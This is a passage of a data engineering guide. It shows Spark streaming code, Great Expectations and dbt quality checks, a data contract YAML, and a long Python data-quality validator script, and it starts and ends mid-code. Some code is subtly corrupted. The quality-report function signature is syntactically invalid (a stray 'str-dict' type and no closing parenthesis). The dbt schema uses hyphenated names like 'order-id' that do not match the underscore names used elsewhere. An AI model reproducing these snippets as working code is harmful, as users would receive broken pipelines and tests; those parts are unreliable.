.option("kafka.bootstrap.servers", "localhost:9092") \
.option("subscribe", "user-events") \
.option("startingOffsets", "latest") \
.option("failOnDataLoss", "false") \
.load()
# Parse JSON
parsed_df = events_df \
.select(from_json(col("value").cast("string"), event_schema).alias("data")) \
.select("data.*") \
.withColumn("event_timestamp", to_timestamp(col("timestamp")))
# Windowed aggregation
aggregated_df = parsed_df \
.withWatermark("event_timestamp", "10 minutes") \
.groupBy(
window(col("event_timestamp"), "5 minutes"),
col("event_type")
) \
.agg(
count("*").alias("event_count"),
approx_count_distinct("user_id").alias("unique_users")
)
# Write to Delta Lake
query = aggregated_df.writeStream \
.format("delta") \
.outputMode("append") \
.option("checkpointLocation", "/checkpoints/user-events-aggregated") \
.option("path", "/data/lake/user_events_aggregated") \
.trigger(processingTime="1 minute") \
.start()
query.awaitTermination()
```
#### Step 4: Handle Late Data and Errors
```python
# Dead letter queue for failed records
from pyspark.sql.functions import current_timestamp, lit
def process_with_error_handling(batch_df, batch_id):
try:
# Attempt processing
valid_df = batch_df.filter(col("event_id").isNotNull())
invalid_df = batch_df.filter(col("event_id").isNull())
# Write valid records
valid_df.write \
.format("delta") \
.mode("append") \
.save("/data/lake/user_events")
# Write invalid to DLQ
if invalid_df.count() > 0:
invalid_df \
.withColumn("error_timestamp", current_timestamp()) \
.withColumn("error_reason", lit("missing_event_id")) \
.write \
.format("delta") \
.mode("append") \
.save("/data/lake/dlq/user_events")
except Exception as e:
# Log error, alert, continue
logger.error(f"Batch {batch_id} failed: {e}")
raise
# Use foreachBatch for custom processing
query = parsed_df.writeStream \
.foreachBatch(process_with_error_handling) \
.option("checkpointLocation", "/checkpoints/user-events") \
.start()
```
#### Step 5: Monitor Stream Health
```python
# monitoring/stream_metrics.py
from prometheus_client import Gauge, Counter, start_http_server
# Define metrics
RECORDS_PROCESSED = Counter(
'stream_records_processed_total',
'Total records processed',
['stream_name', 'status']
)
PROCESSING_LAG = Gauge(
'stream_processing_lag_seconds',
'Current processing lag',
['stream_name']
)
BATCH_DURATION = Gauge(
'stream_batch_duration_seconds',
'Last batch processing duration',
['stream_name']
)
def emit_metrics(query):
"""Emit Prometheus metrics from streaming query."""
progress = query.lastProgress
if progress:
RECORDS_PROCESSED.labels(
stream_name='user-events',
status='success'
).inc(progress['numInputRows'])
if progress['sources']:
# Calculate lag from latest offset
for source in progress['sources']:
end_offset = source.get('endOffset', {})
# Parse Kafka offsets and calculate lag
```
---
### Workflow 3: Data Quality Framework Setup
**Scenario:** Implement comprehensive data quality monitoring with Great Expectations.
#### Step 1: Initialize Great Expectations
```bash
# Install and initialize
pip install great_expectations
great_expectations init
# Connect to data source
great_expectations datasource new
```
#### Step 2: Create Expectation Suite
```python
# expectations/orders_suite.py
import great_expectations as gx
context = gx.get_context()
# Create expectation suite
suite = context.add_expectation_suite("orders_quality_suite")
# Add expectations
validator = context.get_validator(
batch_request={
"datasource_name": "warehouse",
"data_asset_name": "orders",
},
expectation_suite_name="orders_quality_suite"
)
# Schema expectations
validator.expect_table_columns_to_match_ordered_list(
column_list=[
"order_id", "customer_id", "order_date",
"total_amount", "status", "created_at"
]
)
# Completeness expectations
validator.expect_column_values_to_not_be_null("order_id")
validator.expect_column_values_to_not_be_null("customer_id")
validator.expect_column_values_to_not_be_null("order_date")
# Uniqueness expectations
validator.expect_column_values_to_be_unique("order_id")
# Range expectations
validator.expect_column_values_to_be_between(
"total_amount",
min_value=0,
max_value=1000000
)
# Categorical expectations
validator.expect_column_values_to_be_in_set(
"status",
["pending", "confirmed", "shipped", "delivered", "cancelled"]
)
# Freshness expectation
validator.expect_column_max_to_be_between(
"order_date",
min_value={"$PARAMETER": "now - timedelta(days=1)"},
max_value={"$PARAMETER": "now"}
)
# Referential integrity
validator.expect_column_values_to_be_in_set(
"customer_id",
value_set={"$PARAMETER": "valid_customer_ids"}
)
validator.save_expectation_suite(discard_failed_expectations=False)
```
#### Step 3: Create Data Quality Checks with dbt
```yaml
# models/marts/schema.yml
version: 2
models:
- name: "fct-orders"
description: "Order fact table with data quality checks"
tests:
# Row count check
- dbt_utils.equal_rowcount:
compare_model: ref('stg_orders')
# Freshness check
- dbt_utils.recency:
datepart: hour
field: created_at
interval: 24
columns:
- name: "order-id"
description: "Unique order identifier"
tests:
- unique
- not_null
- relationships:
to: ref('dim_orders')
field: order_id
- name: "total-amount"
tests:
- not_null
- dbt_utils.accepted_range:
min_value: 0
max_value: 1000000
inclusive: true
- dbt_expectations.expect_column_values_to_be_between:
min_value: 0
row_condition: "status != 'cancelled'"
- name: "customer-id"
tests:
- not_null
- relationships:
to: ref('dim_customers')
field: customer_id
severity: warn
```
#### Step 4: Implement Data Contracts
```yaml
# contracts/orders_contract.yaml
contract:
name: "orders-data-contract"
version: "1.0.0"
owner: data-team@company.com
schema:
type: object
properties:
order_id:
type: string
format: uuid
description: "Unique order identifier"
customer_id:
type: string
not_null: true
order_date:
type: date
not_null: true
total_amount:
type: decimal
precision: 10
scale: 2
minimum: 0
status:
type: string
enum: ["pending", "confirmed", "shipped", "delivered", "cancelled"]
sla:
freshness:
max_delay_hours: 1
completeness:
min_percentage: 99.9
accuracy:
duplicate_tolerance: 0.01
consumers:
- name: "analytics-team"
usage: "Daily reporting dashboards"
- name: "ml-team"
usage: "Churn prediction model"
```
#### Step 5: Set Up Quality Monitoring Dashboard
```python
# monitoring/quality_dashboard.py
from datetime import datetime, timedelta
import pandas as pd
def generate_quality_report(connection, table_name: "str-dict"
"""Generate comprehensive data quality report."""
report = {
"table": table_name,
"timestamp": datetime.now().isoformat(),
"checks": {}
}
# Row count check
row_count = connection.execute(
f"SELECT COUNT(*) FROM {table_name}"
).fetchone()[0]
report["checks"]["row_count"] = {
"value": row_count,
"status": "pass" if row_count > 0 else "fail"
}
# Freshness check
max_date = connection.execute(
f"SELECT MAX(created_at) FROM {table_name}"
).fetchone()[0]
hours_old = (datetime.now() - max_date).total_seconds() / 3600
report["checks"]["freshness"] = {
"max_timestamp": max_date.isoformat(),
"hours_old": round(hours_old, 2),
"status": "pass" if hours_old < 24 else "fail"
}
# Null rate check
null_query = f"""
SELECT
SUM(CASE WHEN order_id IS NULL THEN 1 ELSE 0 END) as null_order_id,
SUM(CASE WHEN customer_id IS NULL THEN 1 ELSE 0 END) as null_customer_id,
COUNT(*) as total
FROM {table_name}
"""
null_result = connection.execute(null_query).fetchone()
report["checks"]["null_rates"] = {
"order_id": null_result[0] / null_result[2] if null_result[2] > 0 else 0,
"customer_id": null_result[1] / null_result[2] if null_result[2] > 0 else 0,
"status": "pass" if null_result[0] == 0 and null_result[1] == 0 else "fail"
}
# Duplicate check
dup_query = f"""
SELECT COUNT(*) - COUNT(DISTINCT order_id) as duplicates
FROM {table_name}
"""
duplicates = connection.execute(dup_query).fetchone()[0]
report["checks"]["duplicates"] = {
"count": duplicates,
"status": "pass" if duplicates == 0 else "fail"
}
# Overall status
all_passed = all(
check["status"] == "pass"
for check in report["checks"].values()
)
report["overall_status"] = "pass" if all_passed else "fail"
return report
```
---
FILE:scripts/data_quality_validator.py
#!/usr/bin/env python3
"""
Data Quality Validator
Comprehensive data quality validation tool for data engineering workflows.
Features:
- Schema validation (types, nullability, constraints)
- Data profiling (statistics, distributions, patterns)
- Great Expectations suite generation
- Data contract validation
- Anomaly detection
- Quality scoring and reporting
Usage:
python data_quality_validator.py validate data.csv --schema schema.json
python data_quality_validator.py profile data.csv --output profile.json
python data_quality_validator.py generate-suite data.csv --output expectations.json
python data_quality_validator.py contract data.csv --contract contract.yaml
"""
import os
import sys
import json
import csv
import re
import argparse
import logging
import statistics
from pathlib import Path
from typing import Dict, List, Optional, Any, Tuple, Set
from dataclasses import dataclass, field, asdict
from datetime import datetime
from collections import Counter
from abc import ABC, abstractmethod
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
# =============================================================================
# Data Classes
# =============================================================================
@dataclass
class ColumnSchema:
"""Schema definition for a column"""
name: str
data_type: str # string, integer, float, boolean, date, datetime, email, uuid
nullable: bool = True
unique: bool = False
min_value: Optional[float] = None
max_value: Optional[float] = None
min_length: Optional[int] = None
max_length: Optional[int] = None
pattern: Optional[str] = None # regex pattern
allowed_values: Optional[List[str]] = None
description: str = ""
@dataclass
class DataSchema:
"""Complete schema for a dataset"""
name: str
version: str
columns: List[ColumnSchema]
primary_key: Optional[List[str]] = None
row_count_min: Optional[int] = None
row_count_max: Optional[int] = None
@dataclass
class ValidationResult:
"""Result of a single validation check"""
check_name: str
column: Optional[str]
passed: bool
expected: Any
actual: Any
severity: str = "error" # error, warning, info
message: str = ""
failed_rows: List[int] = field(default_factory=list)
@dataclass
class ColumnProfile:
"""Statistical profile of a column"""
name: str
data_type: str
total_count: int
null_count: int
null_percentage: float
unique_count: int
unique_percentage: float
# Numeric stats
min_value: Optional[float] = None
max_value: Optional[float] = None
mean: Optional[float] = None
median: Optional[float] = None
std_dev: Optional[float] = None
percentile_25: Optional[float] = None
percentile_75: Optional[float] = None
# String stats
min_length: Optional[int] = None
max_length: Optional[int] = None
avg_length: Optional[float] = None
# Pattern detection
detected_pattern: Optional[str] = None
top_values: List[Tuple[str, int]] = field(default_factory=list)
@dataclass
class DataProfile:
"""Complete profile of a dataset"""
name: str
row_count: int
column_count: int
columns: List[ColumnProfile]
duplicate_rows: int
memory_size_bytes: int
profile_timestamp: str
@dataclass
class QualityScore:
"""Overall quality score for a dataset"""
completeness: float # % of non-null values
uniqueness: float # % of unique values where expected
validity: float # % passing validation rules
consistency: float # % passing cross-column checks
accuracy: float # % matching expected patterns
overall: float # weighted average
# =============================================================================
# Type Detection
# =============================================================================
class TypeDetector:
"""Detect and infer data types from values"""
PATTERNS = {
'email': r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$',
'uuid': r'^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$',
'phone': r'^\+?[\d\s\-\(\)]{10,}$',
'url': r'^https?://[^\s]+$',
'ipv4': r'^(\d{1,3}\.){3}\d{1,3}$',
'date_iso': r'^\d{4}-\d{2}-\d{2}$',
'datetime_iso': r'^\d{4}-\d{2}-\d{2}[T ]\d{2}:\d{2}:\d{2}',
'credit_card': r'^\d{4}[\s\-]?\d{4}[\s\-]?\d{4}[\s\-]?\d{4}$',
}
@classmethod
def detect_type(cls, values: List[str]) -> str:
"""Detect the most likely data type from a sample of values"""
non_empty = [v for v in values if v and v.strip()]
if not non_empty:
return "string"
# Check for patterns first
for pattern_name, pattern in cls.PATTERNS.items():
regex = re.compile(pattern, re.IGNORECASE)
matches = sum(1 for v in non_empty if regex.match(v.strip()))
if matches / len(non_empty) > 0.9:
return pattern_name
# Check for numeric types
int_count = 0
float_count = 0
bool_count = 0
for v in non_empty:
v = v.strip()
if v.lower() in ('true', 'false', 'yes', 'no', '1', '0'):
bool_count += 1
try:
int(v)
int_count += 1
except ValueError:
try:
float(v)
float_count += 1
except ValueError:
pass
if bool_count / len(non_empty) > 0.9:
return "boolean"
if int_count / len(non_empty) > 0.9:
return "integer"
if (int_count + float_count) / len(non_empty) > 0.9:
return "float"
return "string"
@classmethod
def detect_pattern(cls, values: List[str]) -> Optional[str]:
"""Try to detect a common pattern in string values"""
non_empty = [v for v in values if v and v.strip()]
if not non_empty or len(non_empty) < 10:
return None
for pattern_name, pattern in cls.PATTERNS.items():
regex = re.compile(pattern, re.IGNORECASE)
matches = sum(1 for v in non_empty if regex.match(v.strip()))
if matches / len(non_empty) > 0.8:
return pattern_name
return None
# =============================================================================
# Validators
# =============================================================================
class BaseValidator(ABC):
"""Base class for validators"""
@abstractmethod
def validate(self, data: List[Dict], schema: Optional[DataSchema] = None) -> List[ValidationResult]:
pass
class SchemaValidator(BaseValidator):
"""Validate data against a schema"""
def validate(self, data: List[Dict], schema: DataSchema) -> List[ValidationResult]:
results = []
if not data:
results.append(ValidationResult(
check_name="data_not_empty",
column=None,
passed=False,
expected="non-empty dataset",
actual="empty dataset",
severity="error",
message="Dataset is empty"
))
return results
# Validate row count
row_count = len(data)
if schema.row_count_min and row_count < schema.row_count_min:
results.append(ValidationResult(
check_name="row_count_min",
column=None,
passed=False,
expected=f">= {schema.row_count_min}",
actual=row_count,
severity="error",
message=f"Row count {row_count} is below minimum {schema.row_count_min}"
))
if schema.row_count_max and row_count > schema.row_count_max:
results.append(ValidationResult(
check_name="row_count_max",
column=None,
passed=False,
expected=f"<= {schema.row_count_max}",
actual=row_count,
severity="warning",
message=f"Row count {row_count} exceeds maximum {schema.row_count_max}"
))
# Validate each column
for col_schema in schema.columns:
col_results = self._validate_column(data, col_schema)
results.extend(col_results)
# Validate primary key uniqueness
if schema.primary_key:
pk_results = self._validate_primary_key(data, schema.primary_key)
results.extend(pk_results)
return results
def _validate_column(self, data: List[Dict], col_schema: ColumnSchema) -> List[ValidationResult]:
results = []
col_name = col_schema.name
# Check column exists
if data and col_name not in data[0]:
results.append(ValidationResult(
check_name="column_exists",
column=col_name,
passed=False,
expected="column present",
actual="column missing",
severity="error",
message=f"Column '{col_name}' not found in data"
))
return results
values = [row.get(col_name) for row in data]
failed_rows = []
# Null check
null_count = sum(1 for v in values if v is None or v == '')
if not col_schema.nullable and null_count > 0:
failed_rows = [i for i, v in enumerate(values) if v is None or v == '']
results.append(ValidationResult(
check_name="not_null",
column=col_name,
passed=False,
expected="no nulls",
actual=f"{null_count} nulls",
severity="error",
message=f"Column '{col_name}' has {null_count} null values but is not nullable",
failed_rows=failed_rows[:100] # Limit to first 100
))
non_null_values = [v for v in values if v is not None and v != '']
# Uniqueness check
if col_schema.unique and non_null_values:
unique_count = len(set(non_null_values))
if unique_count != len(non_null_values):
duplicate_values = [v for v, count in Counter(non_null_values).items() if count > 1]
results.append(ValidationResult(
check_name="unique",
column=col_name,
passed=False,
expected="all unique",
actual=f"{len(non_null_values) - unique_count} duplicates",
severity="error",
message=f"Column '{col_name}' has duplicate values: {duplicate_values[:5]}"
))
# Type validation
type_failures = self._validate_type(non_null_values, col_schema.data_type)
if type_failures:
results.append(ValidationResult(
check_name="data_type",
column=col_name,
passed=False,
expected=col_schema.data_type,
actual=f"{len(type_failures)} invalid values",
severity="error",
message=f"Column '{col_name}' has {len(type_failures)} values not matching type {col_schema.data_type}",
failed_rows=type_failures[:100]
))
# Range validation for numeric columns
if col_schema.min_value is not None or col_schema.max_value is not None:
range_failures = self._validate_range(non_null_values, col_schema)
if range_failures:
results.append(ValidationResult(
check_name="value_range",
column=col_name,
passed=False,
expected=f"[{col_schema.min_value}, {col_schema.max_value}]",
actual=f"{len(range_failures)} out of range",
severity="error",
message=f"Column '{col_name}' has values outside range",
failed_rows=range_failures[:100]
))
# Length validation for string columns
if col_schema.min_length is not None or col_schema.max_length is not None:
length_failures = self._validate_length(non_null_values, col_schema)
if length_failures:
results.append(ValidationResult(
check_name="string_length",
column=col_name,
passed=False,
expected=f"length [{col_schema.min_length}, {col_schema.max_length}]",
actual=f"{len(length_failures)} out of range",
severity="warning",
message=f"Column '{col_name}' has values with invalid length",
failed_rows=length_failures[:100]
))
# Pattern validation
if col_schema.pattern:
pattern_failures = self._validate_pattern(non_null_values, col_schema.pattern)
if pattern_failures:
results.append(ValidationResult(
check_name="pattern_match",
column=col_name,
passed=False,
expected=f"matches {col_schema.pattern}",
actual=f"{len(pattern_failures)} non-matching",
severity="error",
message=f"Column '{col_name}' has values not matching pattern",
failed_rows=pattern_failures[:100]
))
# Allowed values validation
if col_schema.allowed_values:
allowed_set = set(col_schema.allowed_values)
invalid = [i for i, v in enumerate(non_null_values) if str(v) not in allowed_set]
if invalid:
results.append(ValidationResult(
check_name="allowed_values",
column=col_name,
passed=False,
expected=f"one of {col_schema.allowed_values}",
actual=f"{len(invalid)} invalid values",
severity="error",
message=f"Column '{col_name}' has values not in allowed list",
failed_rows=invalid[:100]
))
return results
def _validate_type(self, values: List[Any], expected_type: str) -> List[int]:
"""Return indices of values that don't match expected type"""
failures = []
for i, v in enumerate(values):
v_str = str(v)
valid = False
if expected_type == "integer":
try:
int(v_str)
valid = True
except ValueError:
pass
elif expected_type == "float":
try:
float(v_str)
valid = True
except ValueError:
pass
elif expected_type == "boolean":
valid = v_str.lower() in ('true', 'false', 'yes', 'no', '1', '0')
elif expected_type == "email":
valid = bool(re.match(TypeDetector.PATTERNS['email'], v_str, re.IGNORECASE))
elif expected_type == "uuid":
valid = bool(re.match(TypeDetector.PATTERNS['uuid'], v_str, re.IGNORECASE))
elif expected_type in ("date", "date_iso"):
valid = bool(re.match(TypeDetector.PATTERNS['date_iso'], v_str))
elif expected_type in ("datetime", "datetime_iso"):
valid = bool(re.match(TypeDetector.PATTERNS['datetime_iso'], v_str))
else:
valid = True # string accepts anything
if not valid:
failures.append(i)
return failures
def _validate_range(self, values: List[Any], col_schema: ColumnSchema) -> List[int]:
"""Return indices of values outside the specified range"""
failures = []
for i, v in enumerate(values):
try:
num = float(v)
if col_schema.min_value is not None and num < col_schema.min_value:
failures.append(i)
elif col_schema.max_value is not None and num > col_schema.max_value:
failures.append(i)
except (ValueError, TypeError):
pass
return failures
def _validate_length(self, values: List[Any], col_schema: ColumnSchema) -> List[int]:
"""Return indices of values with invalid string length"""
failures = []
for i, v in enumerate(values):
length = len(str(v))
if col_schema.min_length is not None and length < col_schema.min_length:
failures.append(i)
elif col_schema.max_length is not None and length > col_schema.max_length:
failures.append(i)
return failures
def _validate_pattern(self, values: List[Any], pattern: str) -> List[int]:
"""Return indices of values not matching the pattern"""
regex = re.compile(pattern)
return [i for i, v in enumerate(values) if not regex.match(str(v))]
def _validate_primary_key(self, data: List[Dict], pk_columns: List[str]) -> List[ValidationResult]:
"""Validate primary key uniqueness"""
results = []
pk_values = []
for row in data:
pk = tuple(row.get(col) for col in pk_columns)
pk_values.append(pk)
pk_counts = Counter(pk_values)
duplicates = {pk: count for pk, count in pk_counts.items() if count > 1}
if duplicates:
results.append(ValidationResult(
check_name="primary_key_unique",
column=",".join(pk_columns),
passed=False,
expected="all unique",
actual=f"{len(duplicates)} duplicate keys",
severity="error",
message=f"Primary key has {len(duplicates)} duplicate combinations"
))
return results
class AnomalyDetector(BaseValidator):
"""Detect anomalies in data"""
def __init__(self, z_threshold: float = 3.0, iqr_multiplier: float = 1.5):
self.z_threshold = z_threshold
self.iqr_multiplier = iqr_multiplier
def validate(self, data: List[Dict], schema: Optional[DataSchema] = None) -> List[ValidationResult]:
results = []
if not data:
return results
# Get numeric columns
numeric_columns = []
for col in data[0].keys():
values = [row.get(col) for row in data]
non_null = [v for v in values if v is not None and v != '']
try:
[float(v) for v in non_null[:100]]
numeric_columns.append(col)
except (ValueError, TypeError):
pass
for col in numeric_columns:
col_results = self._detect_numeric_anomalies(data, col)
results.extend(col_results)
return results
def _detect_numeric_anomalies(self, data: List[Dict], column: str) -> List[ValidationResult]:
results = []
values = []
for row in data:
v = row.get(column)
if v is not None and v != '':
try:
values.append(float(v))
except (ValueError, TypeError):
pass
if len(values) < 10:
return results
# Z-score method
mean = statistics.mean(values)
std = statistics.stdev(values) if len(values) > 1 else 0
if std > 0:
z_outliers = []
for i, v in enumerate(values):
z_score = abs((v - mean) / std)
if z_score > self.z_threshold:
z_outliers.append((i, v, z_score))
if z_outliers:
results.append(ValidationResult(
check_name="z_score_outlier",
column=column,
passed=len(z_outliers) == 0,
expected=f"z-score <= {self.z_threshold}",
actual=f"{len(z_outliers)} outliers",
severity="warning",
message=f"Column '{column}' has {len(z_outliers)} statistical outliers (z-score method)",
failed_rows=[o[0] for o in z_outliers[:100]]
))
# IQR method
sorted_values = sorted(values)
q1_idx = len(sorted_values) // 4
q3_idx = (3 * len(sorted_values)) // 4
q1 = sorted_values[q1_idx]
q3 = sorted_values[q3_idx]
iqr = q3 - q1
lower_bound = q1 - self.iqr_multiplier * iqr
upper_bound = q3 + self.iqr_multiplier * iqr
iqr_outliers = [(i, v) for i, v in enumerate(values) if v < lower_bound or v > upper_bound]
if iqr_outliers:
results.append(ValidationResult(
check_name="iqr_outlier",
column=column,
passed=len(iqr_outliers) == 0,
expected=f"value in [{lower_bound:.2f}, {upper_bound:.2f}]",
actual=f"{len(iqr_outliers)} outliers",
severity="warning",
message=f"Column '{column}' has {len(iqr_outliers)} outliers (IQR method)",
failed_rows=[o[0] for o in iqr_outliers[:100]]
))
return results
# =============================================================================
# Data Profiler
# =============================================================================
class DataProfiler:
"""Generate statistical profiles of datasets"""
def profile(self, data: List[Dict], name: str = "dataset") -> DataProfile:
"""Generate a complete profile of the dataset"""
if not data:
return DataProfile(
name=name,
row_count=0,
column_count=0,
columns=[],
duplicate_rows=0,
memory_size_bytes=0,
profile_timestamp=datetime.now().isoformat()
)
columns = list(data[0].keys())
column_profiles = []
for col in columns:
profile = self._profile_column(data, col)
column_profiles.append(profile)
# Count duplicates
row_tuples = [tuple(sorted(row.items())) for row in data]
duplicate_count = len(row_tuples) - len(set(row_tuples))
# Estimate memory size
memory_size = sys.getsizeof(data) + sum(
sys.getsizeof(row) + sum(sys.getsizeof(v) for v in row.values())
for row in data
)
return DataProfile(
name=name,
row_count=len(data),
column_count=len(columns),
columns=column_profiles,
duplicate_rows=duplicate_count,
memory_size_bytes=memory_size,
profile_timestamp=datetime.now().isoformat()
)
def _profile_column(self, data: List[Dict], column: str) -> ColumnProfile:
"""Generate profile for a single column"""
values = [row.get(column) for row in data]
non_null = [v for v in values if v is not None and v != '']
total_count = len(values)
null_count = total_count - len(non_null)
null_pct = (null_count / total_count * 100) if total_count > 0 else 0
unique_values = set(str(v) for v in non_null)
unique_count = len(unique_values)
unique_pct = (unique_count / len(non_null) * 100) if non_null else 0
# Detect type
sample = [str(v) for v in non_null[:1000]]
detected_type = TypeDetector.detect_type(sample)
detected_pattern = TypeDetector.detect_pattern(sample)
# Top values
value_counts = Counter(str(v) for v in non_null)
top_values = value_counts.most_common(10)
profile = ColumnProfile(
name=column,
data_type=detected_type,
total_count=total_count,
null_count=null_count,
null_percentage=null_pct,
unique_count=unique_count,
unique_percentage=unique_pct,
detected_pattern=detected_pattern,
top_values=top_values
)
# Add numeric stats if applicable
if detected_type in ('integer', 'float'):
numeric_values = []
for v in non_null:
try:
numeric_values.append(float(v))
except (ValueError, TypeError):
pass
if numeric_values:
sorted_vals = sorted(numeric_values)
profile.min_value = min(numeric_values)
profile.max_value = max(numeric_values)
profile.mean = statistics.mean(numeric_values)
profile.median = statistics.median(numeric_values)
if len(numeric_values) > 1:
profile.std_dev = statistics.stdev(numeric_values)
profile.percentile_25 = sorted_vals[len(sorted_vals) // 4]
profile.percentile_75 = sorted_vals[(3 * len(sorted_vals)) // 4]
# Add string stats
if detected_type == 'string':
lengths = [len(str(v)) for v in non_null]
if lengths:
profile.min_length = min(lengths)
profile.max_length = max(lengths)
profile.avg_length = statistics.mean(lengths)
return profile
# =============================================================================
# Great Expectations Suite Generator
# =============================================================================
class GreatExpectationsGenerator:
"""Generate Great Expectations validation suites"""
def generate_suite(self, profile: DataProfile) -> Dict:
"""Generate a Great Expectations suite from a data profile"""
expectations = []
for col_profile in profile.columns:
col_expectations = self._generate_column_expectations(col_profile)
expectations.extend(col_expectations)
# Table-level expectations
expectations.append({
"expectation_type": "expect_table_row_count_to_be_between",
"kwargs": {
"min_value": max(1, int(profile.row_count * 0.5)),
"max_value": int(profile.row_count * 2)
}
})
expectations.append({
"expectation_type": "expect_table_column_count_to_equal",
"kwargs": {
"value": profile.column_count
}
})
suite = {
"expectation_suite_name": f"{profile.name}_suite",
"expectations": expectations,
"meta": {
"generated_at": datetime.now().isoformat(),
"generator": "data_quality_validator",
"source_profile": profile.name
}
}
return suite
def _generate_column_expectations(self, col_profile: ColumnProfile) -> List[Dict]:
"""Generate expectations for a single column"""
expectations = []
col_name = col_profile.name
# Column exists
expectations.append({
"expectation_type": "expect_column_to_exist",
"kwargs": {"column": col_name}
})
# Null percentage
if col_profile.null_percentage < 1:
expectations.append({
"expectation_type": "expect_column_values_to_not_be_null",
"kwargs": {"column": col_name}
})
elif col_profile.null_percentage < 50:
expectations.append({
"expectation_type": "expect_column_values_to_not_be_null",
"kwargs": {
"column": col_name,
"mostly": 1 - (col_profile.null_percentage / 100 * 1.5)
}
})
# Uniqueness
if col_profile.unique_percentage > 99:
expectations.append({
"expectation_type": "expect_column_values_to_be_unique",
"kwargs": {"column": col_name}
})
# Type-specific expectations
if col_profile.data_type == 'integer':
expectations.append({
"expectation_type": "expect_column_values_to_be_in_type_list",
"kwargs": {
"column": col_name,
"type_list": ["int", "int64", "INTEGER", "BIGINT"]
}
})
if col_profile.min_value is not None:
expectations.append({
"expectation_type": "expect_column_values_to_be_between",
"kwargs": {
"column": col_name,
"min_value": col_profile.min_value,
"max_value": col_profile.max_value
}
})
elif col_profile.data_type == 'float':
expectations.append({
"expectation_type": "expect_column_values_to_be_in_type_list",
"kwargs": {
"column": col_name,
"type_list": ["float", "float64", "FLOAT", "DOUBLE"]
}
})
if col_profile.min_value is not None:
expectations.append({
"expectation_type": "expect_column_values_to_be_between",
"kwargs": {
"column": col_name,
"min_value": col_profile.min_value,
"max_value": col_profile.max_value
}
})
elif col_profile.data_type == 'email':
expectations.append({
"expectation_type": "expect_column_values_to_match_regex",
"kwargs": {
"column": col_name,
"regex": r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$"
}
})
elif col_profile.data_type in ('date_iso', 'date'):
expectations.append({
"expectation_type": "expect_column_values_to_match_strftime_format",
"kwargs": {
"column": col_name,
"strftime_format": "%Y-%m-%d"
}
})
# String length expectations
if col_profile.min_length is not None:
expectations.append({
"expectation_type": "expect_column_value_lengths_to_be_between",
"kwargs": {
"column": col_name,
"min_value": max(1, col_profile.min_length),
"max_value": col_profile.max_length * 2 if col_profile.max_length else None
}
})
# Categorical (low cardinality) columns
if col_profile.unique_count <= 20 and col_profile.unique_percentage < 10:
top_values = [v[0] for v in col_profile.top_values if v[1] > col_profile.total_count * 0.01]
if top_values:
expectations.append({
"expectation_type": "expect_column_values_to_be_in_set",
"kwargs": {
"column": col_name,
"value_set": top_values,
"mostly": 0.95
}
})
return expectations
# =============================================================================
# Quality Score Calculator
# =============================================================================
class QualityScoreCalculator:
"""Calculate overall data quality scores"""
def calculate(self, profile: DataProfile, validation_results: List[ValidationResult]) -> QualityScore:
"""Calculate quality score from profile and validation results"""
# Completeness: average non-null percentage
completeness = 100 - statistics.mean([c.null_percentage for c in profile.columns]) if profile.columns else 0
# Uniqueness: average unique percentage for columns expected to be unique
unique_cols = [c for c in profile.columns if c.unique_percentage > 90]
uniqueness = statistics.mean([c.unique_percentage for c in unique_cols]) if unique_cols else 100
# Validity: percentage of passed checks
total_checks = len(validation_results)
passed_checks = sum(1 for r in validation_results if r.passed)
validity = (passed_checks / total_checks * 100) if total_checks > 0 else 100
# Consistency: percentage of non-error results
error_checks = sum(1 for r in validation_results if not r.passed and r.severity == "error")
consistency = ((total_checks - error_checks) / total_checks * 100) if total_checks > 0 else 100
# Accuracy: based on pattern matching and type detection
pattern_detected = sum(1 for c in profile.columns if c.detected_pattern)
accuracy = min(100, 50 + (pattern_detected / len(profile.columns) * 50)) if profile.columns else 50
# Overall: weighted average
overall = (
completeness * 0.25 +
uniqueness * 0.15 +
validity * 0.30 +
consistency * 0.20 +
accuracy * 0.10
)
return QualityScore(
completeness=round(completeness, 2),
uniqueness=round(uniqueness, 2),
validity=round(validity, 2),
consistency=round(consistency, 2),
accuracy=round(accuracy, 2),
overall=round(overall, 2)
)
# =============================================================================
# Data Contract Validator
# =============================================================================
class DataContractValidator:
"""Validate data against a data contract"""
def load_contract(self, contract_path: str) -> Dict:
"""Load a data contract from file"""
with open(contract_path, 'r') as f:
content = f.read()
# Support both YAML and JSON
if contract_path.endswith('.yaml') or contract_path.endswith('.yml'):
# Simple YAML parsing (for basic contracts)
contract = self._parse_simple_yaml(content)
else:
contract = json.loads(content)
return contract
def _parse_simple_yaml(self, content: str) -> Dict:
"""Parse simple YAML-like format"""
result = {}
current_section = result
section_stack = [(result, -1)]
for line in content.split('\n'):
if not line.strip() or line.strip().startswith('#'):
continue
# Calculate indentation
indent = len(line) - len(line.lstrip())
line = line.strip()
# Pop sections with greater or equal indentation
while section_stack and section_stack[-1][1] >= indent:
section_stack.pop()
current_section = section_stack[-1][0]
if ':' in line:
key, value = line.split(':', 1)
key = key.strip()
value = value.strip()
if value:
# Handle lists
if value.startswith('[') and value.endswith(']'):
current_section[key] = [v.strip().strip('"\'') for v in value[1:-1].split(',')]
elif value.lower() in ('true', 'false'):
current_section[key] = value.lower() == 'true'
elif value.isdigit():
current_section[key] = int(value)
else:
current_section[key] = value.strip('"\'')
else:
current_section[key] = {}
section_stack.append((current_section[key], indent))
elif line.startswith('- '):
# List item
if not isinstance(current_section, list):
# Convert to list
parent = section_stack[-2][0] if len(section_stack) > 1 else result
for k, v in parent.items():
if v is current_section:
parent[k] = [current_section] if current_section else []
current_section = parent[k]
section_stack[-1] = (current_section, section_stack[-1][1])
break
current_section.append(line[2:].strip())
return result
def validate_contract(self, data: List[Dict], contract: Dict) -> List[ValidationResult]:
"""Validate data against contract"""
results = []
# Validate schema section
if 'schema' in contract:
schema_def = contract['schema']
columns = schema_def.get('columns', schema_def.get('fields', []))
for col_def in columns:
col_name = col_def.get('name', col_def.get('column', ''))
if not col_name:
continue
# Check column exists
if data and col_name not in data[0]:
results.append(ValidationResult(
check_name="contract_column_exists",
column=col_name,
passed=False,
expected="column present",
actual="column missing",
severity="error",
message=f"Contract requires column '{col_name}' but it's missing"
))
continue
# Check data type
